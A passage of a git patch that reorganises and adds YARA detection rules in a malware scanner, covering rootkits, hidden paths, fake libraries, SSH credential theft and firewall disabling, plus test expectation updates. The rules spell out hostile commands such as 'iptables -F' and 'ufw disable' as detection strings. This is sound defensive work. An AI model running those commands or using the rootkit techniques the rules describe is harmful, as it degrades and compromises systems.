From b3c737930be836201d4779396de64b1c5c469dad Mon Sep 17 00:00:00 2001 From: Thomas Stromberg Date: Sat, 9 Nov 2024 10:34:54 -0500 Subject: [PATCH 1/7] Improve coverage for timb-machine --- pkg/action/testdata/scan_archive | 3 +- rules/anti-static/elf/entropy.yara | 27 +++++ rules/anti-static/macho/entropy.yara | 26 +++++ .../location}/chdir-unusual.yara | 0 .../location}/dev-mqueue.yara | 0 .../location}/dev-shm.yara | 0 rules/evasion/file/location/lib.yara | 35 +++++++ .../location}/odd_pidfile.yara | 0 .../location}/system_directories.yara | 0 .../location}/system_directory.yara | 0 .../location/tmp_x11-unix.yara} | 0 .../location}/var-root.yara | 0 .../location}/var-run.yara | 0 .../location}/var-tmp.yara | 0 .../name}/rename_system_binary.yara | 0 .../dev_shm.yara => file/prefix/dev.yara} | 11 +++ rules/evasion/file/prefix/lib.yara | 26 +++++ .../hidden.yara => file/prefix/prefix.yara} | 16 --- .../{hidden_paths => file/prefix}/proc.yara | 0 rules/evasion/hidden_paths/dev_mqueue.yara | 10 -- rules/evasion/mimicry/fake-library.yara | 1 + .../process_injection/process-inject.yara | 17 ---- rules/evasion/process_injection/ptrace.yara | 17 ++++ rules/evasion/rootkit/linux_kernel.yara | 47 +++++++++ .../linux_userspace.yara} | 77 +++++++++++++++ rules/evasion/rootkit/posix_userspace.yara | 12 +++ rules/{impact => evasion}/rootkit/refs.yara | 0 .../program/hidden.yara} | 0 rules/exfil/stealer/ssh.yara | 22 +++++ rules/impact/degrade/firewall.yara | 92 ++++++++++++++++++ rules/impact/degrade/iptables.yara | 16 --- rules/impact/degrade/selinux_firewall.yara | 22 ----- rules/impact/degrade/ufw.yara | 24 ----- rules/impact/rootkit/readdir-interceptor.yara | 65 ------------- rules/lateral/scan/scan_tool.yara | 15 ++- rules/malware/family/medusa.yara | 3 +- rules/persist/service/install.yara | 27 +++++ rules/process/thread_local_storage.yara | 4 +- rules/sec-tool/pentest/smbexec.yara | 11 +++ tests/does-nothing/does-nothing.simple | 1 + .../lottie-player.min.js.mdiff | 3 +- .../clean/203.b7219352.chunk.js.simple | 1 + ...4796BB27126E03A7E25DD5D589.cache.js.simple | 2 +- ...D016DDDA0665CB8CD8EEA6C537.cache.js.simple | 2 +- tests/javascript/clean/connection.js.simple | 1 + tests/javascript/clean/faker.js.simple | 3 +- tests/javascript/clean/faker.min.js.simple | 3 +- .../clean/frequency_lists.js.simple | 1 + .../javascript/clean/highlight.esm.js.simple | 2 +- tests/javascript/clean/highlight.js.simple | 2 +- tests/javascript/clean/mode-php.js.simple | 2 +- .../clean/mode-php_laravel_blade.js.simple | 2 +- tests/javascript/clean/php.js.simple | 2 +- .../clean/securityDashboards.plugin.js.simple | 1 + tests/javascript/clean/zxcvbn.js.simple | 1 + tests/linux/2021.FontOnLake/45E9.elf.simple | 9 +- tests/linux/2021.XMR-Stak/1b1a56.elf.simple | 4 +- .../2022.Symbiote/kerneldev.so.bkp.simple | 2 +- tests/linux/2022.bpfdoor/bpfdoor_2.simple | 2 +- tests/linux/2022.ez-pwnkit/payload.simple | 1 + .../freedownloadmanager.sdiff | 2 +- tests/linux/2023.Kinsing/install.sh.simple | 11 +-- tests/linux/2024.Darkcracks/darkcracks.sh.md | 2 +- .../eight-nebraska-autumn-illinois.simple | 3 +- tests/linux/2024.Mirai/ppc.simple | 1 + .../uranus-ack-mike-cat.simple | 3 +- tests/linux/2024.chisel/crondx.simple | 1 + ...4084b7471bc5aed1c81803054f017240a72.simple | 3 +- tests/linux/2024.gas/gas.simple | 1 + .../2024.hadooken/crondr_as_bash.sh.simple | 2 +- tests/linux/2024.hadooken/ssh_worm.sh.simple | 2 +- .../linux/2024.k4spreader/degrader.sh.simple | 3 +- tests/linux/2024.k4spreader/knlib.simple | 2 +- tests/linux/2024.kubo_injector/injector.json | 24 +++-- .../emp3r0r.agent.simple | 9 +- .../2024.kworker_pretenders/gafgyt.simple | 7 +- tests/linux/2024.medusa/rkload.simple | 14 ++- tests/linux/2024.miner_dropper/drop.sh.simple | 2 +- tests/linux/2024.sbcl.market/sbcl.sdiff | 5 +- ...5d0e2031551f9f1a70b6db475ba71b2.elf.simple | 1 + tests/linux/UPX/06ed158.md | 1 + tests/linux/clean/appsec-rules.json.simple | 3 +- tests/linux/clean/caddy.simple | 4 +- tests/linux/clean/chezmoi.simple | 2 +- tests/linux/clean/chrome.simple | 4 +- tests/linux/clean/clickhouse.simple | 8 +- tests/linux/clean/code-oss.md | 5 +- tests/linux/clean/containerd.simple | 7 +- tests/linux/clean/cpack.md | 3 +- tests/linux/clean/default_config.json.simple | 3 +- tests/linux/clean/emscripten.sh.simple | 2 +- ...-9b70-456b-b6b8-007c7d246128_5.json.simple | 6 +- .../kibana/securitySolution.chunk.9.js.simple | 5 +- tests/linux/clean/kuma-cp.simple | 5 +- tests/linux/clean/ld-2.27.so.simple | 2 +- tests/linux/clean/libsystemd.so.0.simple | 5 +- tests/linux/clean/ls.x86_64.md | 1 + tests/linux/clean/lslogins.md | 2 +- tests/linux/clean/melange.simple | 5 +- .../linux/clean/misp_sample.ndjson.log.simple | 2 +- tests/linux/clean/mongosh.simple | 2 +- tests/linux/clean/nvim.simple | 5 +- tests/linux/clean/opa.simple | 1 + tests/linux/clean/pandoc.md | 2 +- tests/linux/clean/ping.x86_64.md | 1 + tests/linux/clean/pulumi.simple | 2 +- .../clean/pypi_package_index.json.simple | 3 +- tests/linux/clean/qemu-system-xtensa.md | 4 +- tests/linux/clean/redis-server.aarch64.md | 1 + tests/linux/clean/rules.json.simple | 5 +- .../clean/runtime-security-fentry.o.simple | 1 + .../runtime-security-syscall-wrapper.o.simple | 1 + tests/linux/clean/runtime-security.o.simple | 1 + tests/linux/clean/searchindex.json.simple | 6 +- tests/linux/clean/slack.md | 6 +- tests/linux/clean/slirp4netns.simple | 4 +- .../clean/sonarlint-metadata.json.simple | 5 +- tests/linux/clean/sudo.simple | 5 +- tests/linux/clean/tracer.o.aarch64.simple | 1 + tests/linux/clean/tree-sitter.md | 87 +++++++++-------- tests/linux/clean/trivy.simple | 8 +- tests/linux/clean/trufflehog.md | 6 +- tests/linux/clean/viewgam.md | 1 + tests/linux/clean/wolfictl.simple | 6 +- tests/linux/clean/zipdetails.md | 2 +- .../2023.3CX/libffmpeg.change_decrease.mdiff | Bin 39788 -> 39788 bytes .../2023.3CX/libffmpeg.change_increase.mdiff | 2 +- tests/macOS/2023.3CX/libffmpeg.decrease.mdiff | Bin 39788 -> 39788 bytes tests/macOS/2023.3CX/libffmpeg.dirty.mdiff | 2 +- tests/macOS/2023.3CX/libffmpeg.increase.mdiff | 2 +- .../var_tmp_exe_starting2.simple | 2 +- tests/macOS/2024.BeaverTail/Jami.json | 8 ++ .../2024.BeaverTail/client_5346.py.simple | 2 +- tests/macOS/2024.Ezuri/libdpt1.so.simple | 1 + tests/macOS/2024.LightSpy/dropper.simple | 2 +- tests/macOS/2024.Rustdoor/localfile.simple | 3 +- tests/macOS/clean/ls.mdiff | 1 + tests/macOS/clean/ls.sdiff.level_2 | 1 + tests/macOS/clean/ls.sdiff.trigger_2 | 1 + tests/macOS/clean/ls.sdiff.trigger_3 | 1 + .../package.json.simple | 2 +- tests/php/clean/composer-2.7.7.simple | 2 +- tests/php/clean/run-tests.php.simple | 1 + .../valyrian_debug_setup.py.simple | 2 +- tests/python/2023.JokerSpy/shared.dat.simple | 2 +- tests/python/clean/numpy/misc_util.py.simple | 2 +- .../windows/2024.aspdasdksa2/creal.exe.simple | 1 + .../windows/2024.aspdasdksa2/creal.pyc.simple | 1 + 148 files changed, 699 insertions(+), 354 deletions(-) create mode 100644 rules/anti-static/elf/entropy.yara create mode 100644 rules/anti-static/macho/entropy.yara rename rules/evasion/{covert-location => file/location}/chdir-unusual.yara (100%) rename rules/evasion/{covert-location => file/location}/dev-mqueue.yara (100%) rename rules/evasion/{covert-location => file/location}/dev-shm.yara (100%) create mode 100644 rules/evasion/file/location/lib.yara rename rules/evasion/{hidden_paths => file/location}/odd_pidfile.yara (100%) rename rules/evasion/{hide_artifacts => file/location}/system_directories.yara (100%) rename rules/evasion/{hide_artifacts => file/location}/system_directory.yara (100%) rename rules/evasion/{hidden_paths/x11.yara => file/location/tmp_x11-unix.yara} (100%) rename rules/evasion/{covert-location => file/location}/var-root.yara (100%) rename rules/evasion/{hidden_paths => file/location}/var-run.yara (100%) rename rules/evasion/{hidden_paths => file/location}/var-tmp.yara (100%) rename rules/evasion/{alt_location => file/name}/rename_system_binary.yara (100%) rename rules/evasion/{hidden_paths/dev_shm.yara => file/prefix/dev.yara} (76%) create mode 100644 rules/evasion/file/prefix/lib.yara rename rules/evasion/{hidden_paths/hidden.yara => file/prefix/prefix.yara} (79%) rename rules/evasion/{hidden_paths => file/prefix}/proc.yara (100%) delete mode 100644 rules/evasion/hidden_paths/dev_mqueue.yara create mode 100644 rules/evasion/rootkit/linux_kernel.yara rename rules/evasion/{hijack_execution/process-hide.yara => rootkit/linux_userspace.yara} (51%) create mode 100644 rules/evasion/rootkit/posix_userspace.yara rename rules/{impact => evasion}/rootkit/refs.yara (100%) rename rules/{evasion/hidden_paths/relative-hidden.yara => exec/program/hidden.yara} (100%) create mode 100644 rules/impact/degrade/firewall.yara delete mode 100644 rules/impact/degrade/iptables.yara delete mode 100644 rules/impact/degrade/selinux_firewall.yara delete mode 100644 rules/impact/degrade/ufw.yara delete mode 100644 rules/impact/rootkit/readdir-interceptor.yara create mode 100644 rules/persist/service/install.yara create mode 100644 rules/sec-tool/pentest/smbexec.yara diff --git a/pkg/action/testdata/scan_archive b/pkg/action/testdata/scan_archive index 3ca22cb57..bcb250b48 100644 --- a/pkg/action/testdata/scan_archive +++ b/pkg/action/testdata/scan_archive @@ -32,7 +32,7 @@ discover/user/HOME: low discover/user/USER: low discover/user/name_get: medium evasion/bypass_security/linux/se: medium -evasion/hidden_paths/hidden: medium +evasion/file/prefix: medium evasion/hide_artifacts/pivot_root: medium exec/plugin: low exec/program: medium @@ -74,6 +74,7 @@ fs/symlink_resolve: low fs/tempdir/tempfile_create: low fs/unmount: low impact/remote_access/heartbeat: medium +lateral/scan/tool: medium net/dns: low net/dns/reverse: medium net/dns/servers: low diff --git a/rules/anti-static/elf/entropy.yara b/rules/anti-static/elf/entropy.yara new file mode 100644 index 000000000..26bdc373a --- /dev/null +++ b/rules/anti-static/elf/entropy.yara @@ -0,0 +1,27 @@ +import "math" + +private rule normal_elf { + condition: + filesize < 64MB and uint32(0) == 1179403647 +} + +private rule small_elf { + condition: + filesize < 400KB and uint32(0) == 1179403647 +} + +rule normal_elf_high_entropy_7: medium { + meta: + description = "higher entropy ELF binary (>7)" + + condition: + normal_elf and math.entropy(1, filesize) >= 7 +} + +rule normal_elf_high_entropy_7_2: high { + meta: + description = "high entropy ELF binary (>7.2)" + + condition: + normal_elf and math.entropy(1, filesize) >= 7.2 +} diff --git a/rules/anti-static/macho/entropy.yara b/rules/anti-static/macho/entropy.yara new file mode 100644 index 000000000..6cd1ea679 --- /dev/null +++ b/rules/anti-static/macho/entropy.yara @@ -0,0 +1,26 @@ +import "math" + +private rule smaller_macho { + condition: + filesize < 64MB and (uint32(0) == 4277009102 or uint32(0) == 3472551422 or uint32(0) == 4277009103 or uint32(0) == 3489328638 or uint32(0) == 3405691582 or uint32(0) == 3199925962) +} + +rule high_entropy_7_2: medium { + meta: + description = "higher entropy binary (>7.2)" + + condition: + smaller_macho and math.entropy(1, filesize) >= 7.2 +} + +rule high_entropy_7_9: high { + meta: + description = "high entropy binary (>7.9)" + + strings: + // prevent bazel false positive + $bin_java = "bin/java" + + condition: + smaller_macho and math.entropy(1, filesize) >= 7.9 and not $bin_java +} diff --git a/rules/evasion/covert-location/chdir-unusual.yara b/rules/evasion/file/location/chdir-unusual.yara similarity index 100% rename from rules/evasion/covert-location/chdir-unusual.yara rename to rules/evasion/file/location/chdir-unusual.yara diff --git a/rules/evasion/covert-location/dev-mqueue.yara b/rules/evasion/file/location/dev-mqueue.yara similarity index 100% rename from rules/evasion/covert-location/dev-mqueue.yara rename to rules/evasion/file/location/dev-mqueue.yara diff --git a/rules/evasion/covert-location/dev-shm.yara b/rules/evasion/file/location/dev-shm.yara similarity index 100% rename from rules/evasion/covert-location/dev-shm.yara rename to rules/evasion/file/location/dev-shm.yara diff --git a/rules/evasion/file/location/lib.yara b/rules/evasion/file/location/lib.yara new file mode 100644 index 000000000..9882dba36 --- /dev/null +++ b/rules/evasion/file/location/lib.yara @@ -0,0 +1,35 @@ +rule libsec: medium linux { + meta: + description = "may pretend to be a fake library" + + strings: + $sec = /\/lib\/libsec[\w\.]{0,16}/ fullword + $dsx = /\/lib\/libdsx[\w\.]{0,16}/ fullword + + condition: + any of them +} + +rule libsec_subdir: high linux { + meta: + description = "fake security library directory" + + strings: + $ref = /\/lib\/libsec[\w\.]{0,16}\/[\.\w\-\%\@]{0,16}/ fullword + + condition: + any of them +} + +rule install_to_lib: high linux { + meta: + description = "may transfer fake libraries into /lib" + + strings: + $cp_p = /cp -p [\w\%\/\.]{0,16} \/lib\/\w{0,16}\.so[\.\s]{0,8}/ fullword + $cp = /cp [\w\%\/\.]{0,16} \/lib\/\w{0,16}\.so[\.\s]{0,8}/ fullword + $mv = /mv [\w\%\/\.]{0,16} \/lib\/\w{0,16}\.so[\.\s]{0,8}/ fullword + + condition: + any of them +} diff --git a/rules/evasion/hidden_paths/odd_pidfile.yara b/rules/evasion/file/location/odd_pidfile.yara similarity index 100% rename from rules/evasion/hidden_paths/odd_pidfile.yara rename to rules/evasion/file/location/odd_pidfile.yara diff --git a/rules/evasion/hide_artifacts/system_directories.yara b/rules/evasion/file/location/system_directories.yara similarity index 100% rename from rules/evasion/hide_artifacts/system_directories.yara rename to rules/evasion/file/location/system_directories.yara diff --git a/rules/evasion/hide_artifacts/system_directory.yara b/rules/evasion/file/location/system_directory.yara similarity index 100% rename from rules/evasion/hide_artifacts/system_directory.yara rename to rules/evasion/file/location/system_directory.yara diff --git a/rules/evasion/hidden_paths/x11.yara b/rules/evasion/file/location/tmp_x11-unix.yara similarity index 100% rename from rules/evasion/hidden_paths/x11.yara rename to rules/evasion/file/location/tmp_x11-unix.yara diff --git a/rules/evasion/covert-location/var-root.yara b/rules/evasion/file/location/var-root.yara similarity index 100% rename from rules/evasion/covert-location/var-root.yara rename to rules/evasion/file/location/var-root.yara diff --git a/rules/evasion/hidden_paths/var-run.yara b/rules/evasion/file/location/var-run.yara similarity index 100% rename from rules/evasion/hidden_paths/var-run.yara rename to rules/evasion/file/location/var-run.yara diff --git a/rules/evasion/hidden_paths/var-tmp.yara b/rules/evasion/file/location/var-tmp.yara similarity index 100% rename from rules/evasion/hidden_paths/var-tmp.yara rename to rules/evasion/file/location/var-tmp.yara diff --git a/rules/evasion/alt_location/rename_system_binary.yara b/rules/evasion/file/name/rename_system_binary.yara similarity index 100% rename from rules/evasion/alt_location/rename_system_binary.yara rename to rules/evasion/file/name/rename_system_binary.yara diff --git a/rules/evasion/hidden_paths/dev_shm.yara b/rules/evasion/file/prefix/dev.yara similarity index 76% rename from rules/evasion/hidden_paths/dev_shm.yara rename to rules/evasion/file/prefix/dev.yara index 85ad99723..e34995047 100644 --- a/rules/evasion/hidden_paths/dev_shm.yara +++ b/rules/evasion/file/prefix/dev.yara @@ -12,3 +12,14 @@ rule dev_shm_hidden: critical linux { condition: $dev_shm and not $ignore_mkstemp } + +rule dev_mqueue_hidden: high { + meta: + description = "path reference within /dev/mqueue (world writeable)" + + strings: + $mqueue = /\/dev\/mqueue\/\.[%\w\.\-\/]{0,64}/ + + condition: + any of them +} diff --git a/rules/evasion/file/prefix/lib.yara b/rules/evasion/file/prefix/lib.yara new file mode 100644 index 000000000..39eb2a2dd --- /dev/null +++ b/rules/evasion/file/prefix/lib.yara @@ -0,0 +1,26 @@ +rule lib_subdir: high linux { + meta: + description = "hides paths within a /lib subdirectory" + + strings: + $ref = /\/lib\/[\w\.]{0,16}\/\.[\.\w\-\%\@]{0,16}/ fullword + + condition: + any of them +} + +rule hidden_library: high { + meta: + description = "hidden path in a Library directory" + hash_2018_Calisto = "81c127c3cceaf44df10bb3ceb20ce1774f6a9ead0db4bd991abf39db828661cc" + hash_2022_CloudMensis_WindowServer = "317ce26cae14dc9a5e4d4667f00fee771b4543e91c944580bbb136e7fe339427" + hash_2020_MacOS_TinkaOTP = "90fbc26c65e4aa285a3f7ee6ff8a3a4318a8961ebca71d47f51ef0b4b7829fd0" + + strings: + $hidden_library = /\/Library\/\.\w{1,128}/ + $not_dotdot = "/Library/../" + $not_private = "/System/Library/PrivateFrameworks/" + + condition: + $hidden_library and none of ($not*) +} diff --git a/rules/evasion/hidden_paths/hidden.yara b/rules/evasion/file/prefix/prefix.yara similarity index 79% rename from rules/evasion/hidden_paths/hidden.yara rename to rules/evasion/file/prefix/prefix.yara index 3601902d3..e5160b02a 100644 --- a/rules/evasion/hidden_paths/hidden.yara +++ b/rules/evasion/file/prefix/prefix.yara @@ -73,19 +73,3 @@ rule hidden_danger_path: critical { condition: $ref } - -rule hidden_library: high { - meta: - description = "hidden path in a Library directory" - hash_2018_Calisto = "81c127c3cceaf44df10bb3ceb20ce1774f6a9ead0db4bd991abf39db828661cc" - hash_2022_CloudMensis_WindowServer = "317ce26cae14dc9a5e4d4667f00fee771b4543e91c944580bbb136e7fe339427" - hash_2020_MacOS_TinkaOTP = "90fbc26c65e4aa285a3f7ee6ff8a3a4318a8961ebca71d47f51ef0b4b7829fd0" - - strings: - $hidden_library = /\/Library\/\.\w{1,128}/ - $not_dotdot = "/Library/../" - $not_private = "/System/Library/PrivateFrameworks/" - - condition: - $hidden_library and none of ($not*) -} diff --git a/rules/evasion/hidden_paths/proc.yara b/rules/evasion/file/prefix/proc.yara similarity index 100% rename from rules/evasion/hidden_paths/proc.yara rename to rules/evasion/file/prefix/proc.yara diff --git a/rules/evasion/hidden_paths/dev_mqueue.yara b/rules/evasion/hidden_paths/dev_mqueue.yara deleted file mode 100644 index 584e9587f..000000000 --- a/rules/evasion/hidden_paths/dev_mqueue.yara +++ /dev/null @@ -1,10 +0,0 @@ -rule dev_mqueue_hidden: high { - meta: - description = "path reference within /dev/mqueue (world writeable)" - - strings: - $mqueue = /\/dev\/mqueue\/\.[%\w\.\-\/]{0,64}/ - - condition: - any of them -} diff --git a/rules/evasion/mimicry/fake-library.yara b/rules/evasion/mimicry/fake-library.yara index 142516adc..ca943c51f 100644 --- a/rules/evasion/mimicry/fake-library.yara +++ b/rules/evasion/mimicry/fake-library.yara @@ -38,3 +38,4 @@ rule libc_fake_number_val: high { condition: any of them } + diff --git a/rules/evasion/process_injection/process-inject.yara b/rules/evasion/process_injection/process-inject.yara index b214d4f19..7221d4021 100644 --- a/rules/evasion/process_injection/process-inject.yara +++ b/rules/evasion/process_injection/process-inject.yara @@ -1,20 +1,3 @@ -rule ptrace_injector: high { - meta: - description = "may inject code into other processes" - hash_2024_procinject_infect = "cb7c09e58c5314e0429ace2f0e1f3ebd0b802489273e4b8e7531ea41fa107973" - - strings: - $maps = /\/{0,1}proc\/[%{][%}\w]{0,1}\/maps/ - $ptrace = "ptrace" fullword - $proc = "process" fullword - $not_qemu = "QEMU_IS_ALIGNED" - $not_chromium = "CHROMIUM_TIMESTAMP" - $not_crashpad = "CRASHPAD" fullword - - condition: - filesize < 67108864 and $maps and $ptrace and $proc and none of ($not*) -} - rule library_injector: high { meta: description = "may inject code into other processes" diff --git a/rules/evasion/process_injection/ptrace.yara b/rules/evasion/process_injection/ptrace.yara index 5ac24b40a..f9331847e 100644 --- a/rules/evasion/process_injection/ptrace.yara +++ b/rules/evasion/process_injection/ptrace.yara @@ -12,3 +12,20 @@ rule ptrace: medium { condition: any of them } + +rule ptrace_injector: high { + meta: + description = "may inject code into other processes" + hash_2024_procinject_infect = "cb7c09e58c5314e0429ace2f0e1f3ebd0b802489273e4b8e7531ea41fa107973" + + strings: + $maps = /\/{0,1}proc\/[%{][%}\w]{0,1}\/maps/ + $ptrace = "ptrace" fullword + $proc = "process" fullword + $not_qemu = "QEMU_IS_ALIGNED" + $not_chromium = "CHROMIUM_TIMESTAMP" + $not_crashpad = "CRASHPAD" fullword + + condition: + filesize < 67108864 and $maps and $ptrace and $proc and none of ($not*) +} diff --git a/rules/evasion/rootkit/linux_kernel.yara b/rules/evasion/rootkit/linux_kernel.yara new file mode 100644 index 000000000..5714bba81 --- /dev/null +++ b/rules/evasion/rootkit/linux_kernel.yara @@ -0,0 +1,47 @@ +rule linux_kernel_module_getdents64: critical linux { + meta: + description = "kernel module that intercepts directory listing" + ref = "https://github.com/m0nad/Diamorphine" + hash_2022_LQvKibDTq4_diamorphine = "aec68cfa75b582616c8fbce22eecf463ddb0c09b692a1b82a8de23fb0203fede" + hash_2023_LQvKibDTq4_diamorphine = "e93e524797907d57cb37effc8ebe14e6968f6bca899600561971e39dfd49831d" + hash_2023_LQvKibDTq4_diamorphine = "d83f43f47c1438d900143891e7a542d1d24f9adcbd649b7698d8ee7585068039" + filetypes = "elf,so" + + strings: + $getdents64 = "getdents64" + $register_kprobe = "register_kprobe" + + condition: + filesize < 1MB and all of them +} + +rule funky_high_signal_killer: high { + meta: + description = "Uses high signals to communicate to a rootkit" + hash_2023_Qubitstrike_branch_raw_mi = "9a5f6318a395600637bd98e83d2aea787353207ed7792ec9911b775b79443dcd" + hash_2023_Qubitstrike_mi = "9a5f6318a395600637bd98e83d2aea787353207ed7792ec9911b775b79443dcd" + hash_2024_locutus_borg_transwarp = "4573af129e3e1a197050e2fd066f846c92de64d8d14a81a13d975a2cbc6d391e" + + strings: + $odd_teen_sig = /kill -1[012346789]/ fullword + $high_sig = /kill -[23456]\d/ fullword + + condition: + filesize < 10MB and any of them +} + +rule lkm_dirent: high { + meta: + description = "kernel rootkit designed to hide files (linux_dirent)" + hash_2023_LQvKibDTq4_diamorphine = "e93e524797907d57cb37effc8ebe14e6968f6bca899600561971e39dfd49831d" + filetypes = "so" + + strings: + $l_dirent = "linux_dirent" + $linux = "Linux" + $not_syscalls = "#define _LINUX_SYSCALLS_H" + $not_itimer = "__kernel_old_itimerval" + + condition: + filesize < 2MB and all of ($l*) and none of ($not*) +} diff --git a/rules/evasion/hijack_execution/process-hide.yara b/rules/evasion/rootkit/linux_userspace.yara similarity index 51% rename from rules/evasion/hijack_execution/process-hide.yara rename to rules/evasion/rootkit/linux_userspace.yara index df35218e1..e7c42b737 100644 --- a/rules/evasion/hijack_execution/process-hide.yara +++ b/rules/evasion/rootkit/linux_userspace.yara @@ -1,3 +1,80 @@ +rule readdir_intercept: high { + meta: + description = "userland rootkit designed to hide files (readdir64)" + hash_2023_lib_pkit = "8faa04955eeb6f45043003e23af39b86f1dbfaa12695e0e1a1f0bc7a15d0d116" + hash_2023_lib_pkitarm = "67de6ba64ee94f2a686e3162f2563c77a7d78b7e0404e338a891dc38ced5bd71" + hash_2023_lib_skit = "427b1d16f16736cf8cee43a7c54cd448ca46ac9b573614def400d2d8d998e586" + filetypes = "so,c" + + strings: + $r_new65 = "readdir64" fullword + $r_old64 = "_readdir64" + $r_new32 = "readdir" fullword + $r_old32 = "_readdir" + $not_ld_debug = "LD_DEBUG" + $not_libc = "getusershell" + + condition: + filesize < 2MB and uint32(0) == 1179403647 and all of ($r*) and none of ($not*) +} + +rule readdir_tcp_wrapper_intercept: high { + meta: + description = "userland rootkit designed to hide files and bypass tcp-wrappers" + ref = "https://github.com/ldpreload/Medusa" + filetypes = "so,c" + + strings: + $r_new65 = "readdir64" fullword + $r_old64 = "_readdir64" + $r_new32 = "readdir" fullword + $r_old32 = "_readdir" + $r_hosts_access = "hosts_access" + + condition: + filesize < 2MB and uint32(0) == 1179403647 and all of ($r*) +} + +rule medusa_like_ld_preload: critical linux { + meta: + description = "LD_PRELOAD rootkit" + ref = "https://github.com/ldpreload/Medusa" + + strings: + $cloned_thread = "DYNAMIC LINKER BUG!" + $__execve = "__execve" fullword + $lxstat64 = "__lxstat64" fullword + $syslog = "syslog" fullword + $LD_PRELOAD = "LD_PRELOAD" fullword + $LD_LIBRARY_PATH = "LD_LIBRARY_PATH" fullword + $archloaded = "archloaded" fullword + $rkload = "rkload" fullword + $wcs = "wcsmbsload" fullword + $readdir64 = "readdir64" fullword + + condition: + filesize < 2MB and 85 % of them +} + +rule linux_rootkit_terms: critical linux { + meta: + description = "appears to be a Linux rootkit" + filetypes = "elf,so" + + strings: + $s_Rootkit = "Rootkit" + $s_r00tkit = "r00tkit" + $s_r00tk1t = "r00tk1t" + $s_rootkit = "rootkit" fullword + + $o_systemctl = "systemctl" fullword + $o_sshd = "sshd" fullword + $o_miner = "miner" fullword + + condition: + filesize < 10MB and any of ($s*) and any of ($o*) +} + rule elf_processhide: high { meta: description = "userland rootkit designed to hide processes" diff --git a/rules/evasion/rootkit/posix_userspace.yara b/rules/evasion/rootkit/posix_userspace.yara new file mode 100644 index 000000000..8ae649c5c --- /dev/null +++ b/rules/evasion/rootkit/posix_userspace.yara @@ -0,0 +1,12 @@ +rule readdir_intercept_source: high { + meta: + description = "userland rootkit source designed to hide files (DECLARE_READDIR)" + filetypes = "so,c" + + strings: + $declare = "DECLARE_READDIR" + $hide = "hide" + + condition: + filesize < 200KB and all of them +} diff --git a/rules/impact/rootkit/refs.yara b/rules/evasion/rootkit/refs.yara similarity index 100% rename from rules/impact/rootkit/refs.yara rename to rules/evasion/rootkit/refs.yara diff --git a/rules/evasion/hidden_paths/relative-hidden.yara b/rules/exec/program/hidden.yara similarity index 100% rename from rules/evasion/hidden_paths/relative-hidden.yara rename to rules/exec/program/hidden.yara diff --git a/rules/exfil/stealer/ssh.yara b/rules/exfil/stealer/ssh.yara index 008799cce..6fb58f29d 100644 --- a/rules/exfil/stealer/ssh.yara +++ b/rules/exfil/stealer/ssh.yara @@ -48,3 +48,25 @@ rule stealssh: critical { condition: filesize < 10MB and $folder and any of ($steal*) } + +rule sshd_tmp_policy: high { + meta: + description = "adjusts sshd tmp policy, possibly to dump credentials" + + strings: + $unconfined = "unconfined_u:object_r:sshd_tmp_t:s0" + + condition: + any of them +} + +rule ssh_pass_file: high { + meta: + description = "may store SSH passwords" + + strings: + $unconfined = /sshpass\w\.txt/ + + condition: + any of them +} diff --git a/rules/impact/degrade/firewall.yara b/rules/impact/degrade/firewall.yara new file mode 100644 index 000000000..ed967cae9 --- /dev/null +++ b/rules/impact/degrade/firewall.yara @@ -0,0 +1,92 @@ +import "math" + +rule selinux_firewall: high linux { + meta: + hash_2023_Unix_Downloader_Rocke_228e = "228ec858509a928b21e88d582cb5cfaabc03f72d30f2179ef6fb232b6abdce97" + hash_2023_Unix_Downloader_Rocke_2f64 = "2f642efdf56b30c1909c44a65ec559e1643858aaea9d5f18926ee208ec6625ed" + hash_2023_Unix_Downloader_Rocke_6107 = "61075056b46d001e2e08f7e5de3fb9bfa2aabf8fb948c41c62666fd4fab1040f" + filetypes = "elf,so" + description = "references both SELinux and iptables/firewalld" + + strings: + $selinux = /SELINUX[=\w]{0,32}/ fullword + $f_iptables = /iptables[ -\w]{0,32}/ + $f_firewalld = /[\w ]{0,32}firewalld/ + $not_ip6tables = "NFTNL_RULE_TABLE" + $not_iptables = "iptables-restore" + $not_iptables_nft = "iptables-nft" + $not_selinux_init = "SELINUX_INIT" + $not_define = "#define" fullword + $not_netlink = "NETLINK" fullword + + condition: + filesize < 1MB and $selinux and any of ($f*) and none of ($not*) +} + +import "math" + +private rule ufw_tool { + strings: + $not_route = "route-insert" + $not_statusverbose = "statusverbose" + $not_enables_the = "enables the" + $not_enable_the = "enable the" + $not_enable = "ufw enable" + + condition: + filesize < 256KB and any of them +} + +rule ufw_disable_word: high { + meta: + description = "disables ufw firewall" + + strings: + $ref = /ufw['", ]{1,4}disable/ fullword + + condition: + filesize < 256KB and $ref and not ufw_tool +} + +rule iptables_disable: high { + meta: + description = "disables iptables firewall" + + strings: + $input = "iptables -P INPUT ACCEPT" + $output = "iptables -P OUTPUT ACCEPT" + $forward = "iptables -P FORWARD ACCEPT" + $flush = "iptables -F" + + condition: + filesize < 1MB and 3 of them +} + +rule netsh_firewall: high windows { + meta: + description = "adds exception to Windows netsh firewall" + + strings: + $netsh = "netsh" + $firewall = "firewall" + $firewall2 = "advfirewall" + $allowedprogram = /allowedprogram.{0,64}ENABLE/ + + condition: + $netsh and any of ($firewall*) and $allowedprogram +} + +rule netsh_firewall_split: high windows { + meta: + description = "adds exception to Windows netsh firewall" + + strings: + $netsh = "netsh" + $firewall = "firewall" + $firewall2 = "advfirewall" + $allowedprogram = "allowedprogram" + $ENABLE = "ENABLE" + + condition: + filesize < 5MB and $netsh and any of ($firewall*) and $allowedprogram and $ENABLE +} diff --git a/rules/impact/degrade/iptables.yara b/rules/impact/degrade/iptables.yara deleted file mode 100644 index 162b11189..000000000 --- a/rules/impact/degrade/iptables.yara +++ /dev/null @@ -1,16 +0,0 @@ -import "math" - -rule iptables_disable: high { - meta: - description = "disables iptables firewall" - - strings: - $input = "iptables -P INPUT ACCEPT" - $output = "iptables -P OUTPUT ACCEPT" - $forward = "iptables -P FORWARD ACCEPT" - $flush = "iptables -F" - - condition: - filesize < 1MB and 3 of them -} - diff --git a/rules/impact/degrade/selinux_firewall.yara b/rules/impact/degrade/selinux_firewall.yara deleted file mode 100644 index 5e86a102a..000000000 --- a/rules/impact/degrade/selinux_firewall.yara +++ /dev/null @@ -1,22 +0,0 @@ -rule selinux_firewall: high linux { - meta: - hash_2023_Unix_Downloader_Rocke_228e = "228ec858509a928b21e88d582cb5cfaabc03f72d30f2179ef6fb232b6abdce97" - hash_2023_Unix_Downloader_Rocke_2f64 = 